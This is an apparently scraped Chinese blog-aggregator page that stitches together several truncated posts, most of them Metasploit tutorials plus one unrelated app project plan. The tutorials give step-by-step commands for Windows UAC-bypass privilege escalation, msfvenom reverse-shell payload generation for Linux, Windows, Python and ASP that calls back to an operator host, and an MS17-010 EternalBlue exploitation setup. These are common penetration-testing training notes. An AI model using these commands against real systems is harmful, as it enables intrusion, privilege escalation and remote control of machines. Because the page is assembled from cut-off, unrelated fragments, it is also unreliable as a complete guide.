msf

msf 连接数据库

匿名 (未验证) 提交于 2019-12-03 00:22:01
首先启动 postgresql 数据库: /etc/init.d/postgresql start ;或者 service postgresql start ; 1 、在 kali 中 metasploit 默认使用 postgresql 作为它的数据库;   想要开启 metasploit 服务首先得打开 postgresql 数据库,   命令如下:(或者: /etc/init.d/postgresql start );   因为在 kali 中所有的服务都不是默认开机自启的,   所以想要开机自启,命令如下: update-rc.d postgresql enable 。 初始化 MSF 数据库(关键步骤!): msfdb init ; root@kali:~# msfdb reinit root@kali:~# msfdb start root@kali:~# msfconsole 在 msf 中查看数据库连接状态: db_status 。 db_nmap -sS -sV -O --script=smb-vuln-*.nse -n 192.168.1.103 文章来源: msf 连接数据库

外卖服务APP

匿名 (未验证) 提交于 2019-12-03 00:19:01
计划项目:外卖服务APP; 项目计划:2018.5.30-2019.10.30预计在一年半时间内完成; 功能:为各行业和公司提供大量的外卖服务工作,与各大公司和企业专门负责其饮食的外卖服务工作。 分工:吕做前期的需求分析;李布置主界面;四人一起完成编写代码阶段,马进行软件测试,并在其帮助下施进行BUG修复,最后四人共同完成收尾工作。 开发方法: Scrum +MSF +MSF-CMMI 文章来源: 外卖服务APP

msf_bypassuac提权

匿名 (未验证) 提交于 2019-12-03 00:18:01
反弹msf之前也发了好几篇了,这里小伙子就直接利用已经反弹回来的meterpreter进行uac提权了 一.现在利用meterpreter的getuid进行查看权限,getuid. 这就是一个普通的用户 二.直接利用msf的getsystem尝试提权,getsystem 显示提权失败 三.把这个sessions后台运行,background 四.使用bypassuac模块,use exploit/windows/local/bypassuac_eventvwr 五.对参数进行设置 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.43.79(本机ip) set LPORT 8888(本机接受的端口) set target 1 (设置1为x64的,0为x86的,可以show targets进行查看) set SESSION 1(指向我们刚刚后台运行的那个session) 运行生成一个新的session,exploit 进入新的session后,getsystem getuid查看下权限 提权成功 感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!! 文章来源: msf_bypassuac提权

在windows系统下安装使用msf

匿名 (未验证) 提交于 2019-12-03 00:13:02
前沿 msf基本是我在kali里最经使用的工具了 因为今天碰到一些关于VmWare的事情没有解决 windows在前一段时间更新,要求我卸载vmware虚拟机,否则就无法更新。 卸载之后再装回来就无法再安装kali 不是黑屏就是计算机禁止cpu虚拟化(我在biso里面已经设置cpu虚拟化了的) 甲方爸爸又在催我做黑盒测试 所以就萌生出了在windows下安装msf的想法 下载 因为在官网下载太慢,所以我就在官网下完上传到百度网盘 metasploit-framework4.x 百度网盘下载: 链接: https://pan.baidu.com/s/1kLi6XMuaJeYTapXeMZbeXg 提取码: pdkv 安装 安装这个过程也是非常简单 所以就不展示过程了 但是有一点很重要,在安装的过程中要退出杀毒软件 使用 环境变量 首先就需要设置环境变量 以windows10为例 右键桌面上的此电脑图标 找到属性,点开,在右边找到高级系统设置 找到环境变量,点击 在第一个框框里点path,再在下面找到编辑按钮 点击 选择新建 找到你安装msf的目录 然后填进去 比如我安装在D盘 那就填D:\metasploit-framework 然后点确定 打开msf 输入win+r 再输入cmd 输入msfconsole 等出现字符画就可以啦 来源:博客园 作者: M0rta1s 链接:https

MSF――信息收集(四)

匿名 (未验证) 提交于 2019-12-03 00:08:02
MSF系列: MSF――基本使用和Exploit模块(一) MSF――Payload模块(二) MSF――Meterpreter(三) MSF――信息收集(四) 发现和端口扫描 Nmap扫描 db_nmap -sV 192.168.1.0/24 Auxiliary模块 RHOSTS在指定目标时可以指定多个目标 指定IP范围:192.168.171.1.20-192.168.171.30 指定两个主机段:192.168.1.0/24,192.168.11.0/24 导入文件中的IP:file:/rooot/host.txt search arp arp扫描 INTERFACE可以指定使用哪个网卡发包,SHOST可以伪装成别的IP,SMAC可以伪装成别的MAC地址,THREADS设置扫描的线程数 search portscan 端口扫描有以下几个模块,我们这里用syn扫描 步骤都差不多,show options查看要填写的参数信息,然后run运行 IPID Idle扫描 向一个空闲主机发包,这个空闲主机必须要有一个特点,它的IP包头里的ID值是顺序增长的,假如发给它第一个包的响应ID是1,下一次响应的ID就是2 根据它这个变化的IPID的值,伪装扫描的源IP地址,把源IP改成目标的IP,以目标IP为源IP向这个空闲主机发包,根据这个ID的值判断目标主机是否活着,目标端口是否开放

Msf小结

匿名 (未验证) 提交于 2019-12-02 23:55:01
Msfvenom是有效负载生成和编码的组合。 1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell 1 msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "\x00\x0a\x0d" -a x86 --platform win -f c 1 msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py 1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp 1 msfvenom -p cmd/unix/reverse_bash LHOST=

MS17-010漏洞复现

匿名 (未验证) 提交于 2019-12-02 23:05:13
首先msfconsole的smb模块扫描,看看是否有漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.1.129 Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona rhost => 192.168.1.129 msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机 lhost => 192.168.1.132 msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 2000,个人认为) shell成功了

msf端口扫描

允我心安 提交于 2019-12-02 11:36:48
使用MSF发现主机和端口扫描 使用search命令查找需要的模块 MSF模块太多,记不住怎么办!!! 我们不需要记住所有模块,我们只要能找到我们想用的模块就行,平时积累使用的模块也行哦! 比如,我们通过扫描发现目标开放ftp服务,我们想查找关于ftp服务的模块 命令: search ftp 更多使用方法!自己多去研究哦! 使用db_nmap 命令和nmap用法一样,这里不做太多演示。 使用db_nmap用于主机发现 命令: db_nmap -sn 192.168.14.0/24 db_nmap 192.168.14.0/24 使用hosts查看扫描出来的主机 使用Auxiliary 扫描模块 主机发现(网段主机发现) auxiliary/scanner/discover/arp_sweep模块 参数: INTERFACE(指定发包网卡 可选参数)、RHOSTS(目标)、SHOST(伪造IP 可选参数)、SMAC(伪造MAC地址 可选参数)、THREADS(线程数) 端口发现 auxiliary/scanner/portscan/syn模块 参数: INTERFACE(可选参数)、PORTS(目标端口)、RHOSTS、THREADS(这里线程可以指定大一点,比如50) 端口扫描模块 auxiliary/scanner/portscan scanner/portscan/ack

msf下的各种生成payload命令

≯℡__Kan透↙ 提交于 2019-12-02 06:18:46
msf下的各种生成payload命令 List payloads msfvenom -l Binaries: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho Web Payloads PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php

php微服务框架 PHP-MSF 的容器部署和使用

。_饼干妹妹 提交于 2019-12-02 00:47:27
一、需求 PHP-msf 是 Carema360 开发的 PHP 微服务框架,目前我没有实际用过,但是市面上的微服务框架要么在推崇 Spring 系,要么是 go/node ,由于想用 PHP 搞微服务,就顺便搜了下 PHP 的微服务框架,发现了 php-msf。 php-msf 的文档少得可怜,就是简单的介绍了一下。不过如果熟悉 MVC 的 PHP 开发框架的话,只要熟练一下 API 就可以了,其他倒没什么。 作为微服务框架,与 Docker 一定是有联系的, 而我觉得 php-msf 在这方面做得很不错,而且有自己的 Docker 镜像列表来 pull,省去自己配置环境的麻烦。 Docker 镜像列表: https://github.com/pinguo/php-msf-docker php-msf 的文档已经无法打开了,可以去 github 看看: https://github.com/pinguo/php-msf-docs 为了方便,我做了个看云的文档,目前几张图片我还没完全搞上去: https://www.kancloud.cn/ptbird/phpmsfdoc/458151 二、部署容器 在 Docker 中安装部署,直接用他的 Docker 镜像: -p 2201:22 :为了方便 ssh 登录容器开放的端口映射,不用也无所谓的,因为可以使用 docker -it